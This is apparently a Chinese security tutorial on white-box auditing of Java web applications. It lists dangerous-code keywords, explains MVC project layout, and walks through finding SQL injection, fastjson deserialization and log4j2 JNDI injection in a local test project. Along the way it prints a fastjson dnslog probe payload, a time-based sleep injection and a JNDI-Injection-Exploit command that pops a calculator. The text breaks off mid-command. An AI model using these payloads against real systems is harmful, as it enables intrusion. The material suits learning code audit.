首页
    活动
      社区
        学院
          安全导航

            代码审计之路之白盒挖掘机

            阅读量969274

            发布时间 : 2022-09-05 14:30:32

            Java审计其实和Php审计的思路一样,唯一不同的可能是复杂的框架和代码。
            1.正向跟踪
            从数据层查找变量,一级一级调用,最后到控制器,这种相对简单、快速。
            2.逆向思维,追踪变量,对象调用
            查找变量,有没有传参数,是谁调用了这个变量,又是谁调用了这个方法,先从控制器找变量,然后逆着找方法,调用关系,最后到DAO层数据。这种方法一般比较浪费时间,跟踪到最后可能发现变量不可控。
            3.直接挖掘漏洞点
            比如搭建后,访问平台,发现有上传的功能,直接去控制器找上传相关代码,进行审计。
            4.通读全文代码
            这是最纯粹、最直接的方式。但是可能会遇到一个问题——看不懂代码。
            怎么解决?这个我也不知道,我也看不懂……
            1
            关键字定位
            SQL注入
            大多数JavaEE网站,用的相对多的是SpringMVC架构,那么用到的Mybatis框架就会比较多,所以搜索SQL关键字就是”${}”优先,其次是以下的关键字。
            如果是SpringBoot ,可能会使用注解等方式,如:
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">@<span class="code-snippet__keyword" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">query</span>(<span class="code-snippet__keyword" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">selectid</span> from user where name = ?);</span>
            以上语句写了”?”,则代表是预编译语句,就不会产生注入,如果写的是变量,就可能产生注入了。 
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__variable" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #2fb0f2; --darkreader-inline-outline: initial; --darkreader-inline-color: #3db5f3; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">${}</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">select</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">insert</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">update</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__keyword" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">in</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">like</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">obderby</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">statement</span>
            文件上传
            在文件上传功能中,先看框架——比如Spring框架,默认不会解析jsp文件。然后看代码有没有定义黑名单数组等等。
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">org</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.apache</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.comons</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.fileupload</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">file</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">xxxstream</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">RequestMethod</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">MultipartHttpServletRequest</span></span>
             

            xss

            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attribute" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #2fb0f2; --darkreader-inline-outline: initial; --darkreader-inline-color: #3db5f3; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">getParamter</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><%=</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">param</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">el表达式</span>
             

            目录遍历

             
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">path</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">System</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.GetProperty</span>("<span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">yser</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.dir</span>")</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">fileInputStream</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">file</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.read</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">filePath</span></span>

            xml注入类似xxe

             
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">DocumentBuilder</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">XMLStreamReader</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">SAXBuilder</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">SAXParserSAXReader</span> </span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">XMLReader</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">SAXSource</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">TransformerFactory</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">SAXTransformerFactory</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attr" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">SchemaFactory</span></span>
             

            命令执行

             
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">ProcessBuilder</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">start</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">Runtime</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">getRuntime</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__built_in" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">exec</span></span>
             

            序列化

             
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">readObject</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">readUnshared</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">XMLDecoder</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.readObject</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">Yaml</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.load</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">XStream</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.fromXML</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">ObjectMapper</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.readValue</span></span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__selector-tag" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">JSON</span><span class="code-snippet__selector-class" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">.parseObject</span></span>
             

            任意文件删除

             
            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__keyword" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #cf8a4b; --darkreader-inline-outline: initial; --darkreader-inline-color: #d39359; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">delete</span></span>
            逻辑漏洞没什么关键字,可以去看User控制器,或者看过滤器,寻找有无校验。
            2
            MVC模式讲解
            MVC模式是一种软件框架模式,被广泛应用在JavaEE项目的开发中。
            MVC即模型(Model)、视图(View)、控制器(Controller)。
            模型(Model)
            模型是用于处理数据逻辑的部分。
            所谓数据逻辑,也就是数据的映射以及对数据的增删改查,Bean、DAO(dataaccess object,数据访问对象)等都属于模型部分。
            视图(View)
            视图负责数据与其它信息的显示,也就是给用户看到的页面。
            HTML、JSP等页面都可以作为视图。
            控制器(controller)
            控制器是模型与视图之间的桥梁,控制着数据与用户的交互。
            控制器通常负责从视图读取数据,处理用户输入,并向模型发送数据,也可以从模型中读取数据,再发送给视图,由视图显示。
            首先要了解项目整体结构。大致了解作者编写逻辑,搞清请求流程。
            src/main下面有两个目录,分别是java和resources,java目录中主要存放的是java代码,resources目录中主要存放的是资源文件,比如:html、js、css等。
            在Java目录下还有其他一些常见目录,具体含义整理如下:
            /java目录下
            annotation:放置项目自定义注解;
            controller/: 存放控制器,接收从前端传来的参数,对访问控制进行转发、各类基本参数校验或者不复用的业务简单处理等;
            dao/: 数据访问层,与数据库进行交互,负责数据库操作,在Mybaits框架中存放自定义的Mapper接口;
            entity/: 存放实体类;
            interceptor/: 拦截器;
            service/:存放服务类,负责业务模块逻辑处理。Service层中有两种类,一是Service,用来声明接口;二是ServiceImpl,作为实现类实现接口中的方法;
            utils/: 存放工具类;
            dto/: 存放数据传输对象(DataTransfer Object),如请求参数和返回结果;
            vo/: 视图对象(ViewObject)用于封装客户端请求的数据,防止部分数据泄漏,保证数据安全
            constant/: 存放常量;
            filter/: 存放过滤器。
            /resources目录下
            mapper/:存放Mybaits的mapper.xml文件;
            static/:存放静态资源文件目录(Javascript、CSS、图片等),在这个目录中的所有文件可以被直接访问;
            templates/: 存放模版文件;
            application.properties或application.yml:Spring Boot:默认配置文件。
            代码跟踪流程
            用户请求URL发送到服务器,服务器解析请求后发送到后端代码处理请求。
            在后端代码处,首先经过Filter(过滤器)和Interceptor(拦截器),然后根据请求的URL映射到绑定的Controller,之后调用Service接口类,然后再调用serviceImpl接口实现类,最后调用DAO。
            controller:负责简单的逻辑处理和参数校验功能,之后调用Service;
            service:接口类,主要负责业务模块逻辑处理;
            serviceImpl:接口实现类,实现类实现service接口中的方法;
            DAO:如果service涉及数据库操作就会调用DAO。DAO主要处理数据库操作。DAO只做中间传递角色,

            环境搭建

            以某项目为例。
            配置maven环境,更改中文镜像:

            找到配置文件更改端口,数据库信息等,找到sqls文件夹,创建数据库导入数据即可:

            等pom.xml页面没有爆红,并且自己显示了绿色按钮就可以开启环境了:

            启动项目:

            3
            漏洞挖掘

            SQL注入P1

            因为用了mybatis框架,所以先搜索看看有没有使用不安全的符号进行传参:

            总共发现了五个,选择第一个开始审计:

            参数点在88行,向上寻找调用语句:

            上面图片中,88为变量所在行数,向上寻找select参数,发现是在55行,点击箭头,即可跳转到对应的接口类。

            继续寻找,点击方法:

            先在漏洞点打上断点,标记下:

            然后找方法:

            RequestMapping 是映射的路径,浏览器访问试试:

            找到对应的页面:

            注意这些字段,orderby是通过web传参,isdesc默认是true:

            然后orderutil默认null,判断orderby是否为空,不为空则执行打印,然后吧数据带入到orderutil,再然后带入断点的地方:

            查看此方法,没有做过滤:

            Web抓包进行测试,默认是空的,加上sleep(4),延迟有点高:

            sqlmap验证:

            SQL注入P2
            经过上面的流程,我们大致知道审计步骤了,那再尝试一个:

            可以发现 和刚才的一样:

            剩下的也是同样的思路。
            fastjson反序列化
            搜索关键字:

            又回到了刚才的代码:

            上方的注释告诉我们,这是在产品添加功能。
            把鼠标放到数据里,会显示原数据格式,是json没错了:

            dnslog探测:

             

             

            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">{<span class="code-snippet__string" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #ef3564; --darkreader-inline-outline: initial; --darkreader-inline-color: #f0426e; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">"@type"</span>:<span class="code-snippet__string" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #ef3564; --darkreader-inline-outline: initial; --darkreader-inline-color: #f0426e; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">"java.net.Inet4Address"</span>,<span class="code-snippet__string" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #ef3564; --darkreader-inline-outline: initial; --darkreader-inline-color: #f0426e; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">"val"</span>:<span class="code-snippet__string" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #ef3564; --darkreader-inline-outline: initial; --darkreader-inline-color: #f0426e; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">"bb1e2x.dnslog.cn"</span>}</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">url编码</span><span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">%7B%22%40%74%79%70%65%22%3A%22%6A%61%76%61%2E%6E%65%74%2E%49%6E%65%74%34%41%64%64%72%65%73%73%22%2C%22%76%61%6C%22%3A%22%62%62%31%65%32%78%2E%64%6E%73%6C%6F%67%2E%63%6E%22%7D</span>

            log4j2远程代码执行
            搜索关键字info、error、logger等,找变量拼接:

            获取的是个整数不是字符串,这个就不能被控制。接着找。找了一圈,终于找到有字符串的了:

            来到上传头像的地方,抓包:

            获取了数据but dnslog,没数据看了下jdk,原来版本太高了,换一下版本,发现仍然不行。尝试弹计算器,结果成功:

             

             

            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline=""><span class="code-snippet__attribute" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #2fb0f2; font-weight: 400; --darkreader-inline-outline: initial; --darkreader-inline-color: #3db5f3; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">java</span>-jar JNDI-Injection-Exploit-1.0-SNAPSHOT-<span class="code-snippet__literal" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #2fb0f2; --darkreader-inline-outline: initial; --darkreader-inline-color: #3db5f3; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">all</span>.jar -C <span class="code-snippet__string" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; color: #ef3564; --darkreader-inline-outline: initial; --darkreader-inline-color: #f0426e; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">"open/System/Applications/Calculator.app"</span> -A <span class="code-snippet__string" style="margin: 0px; padding: 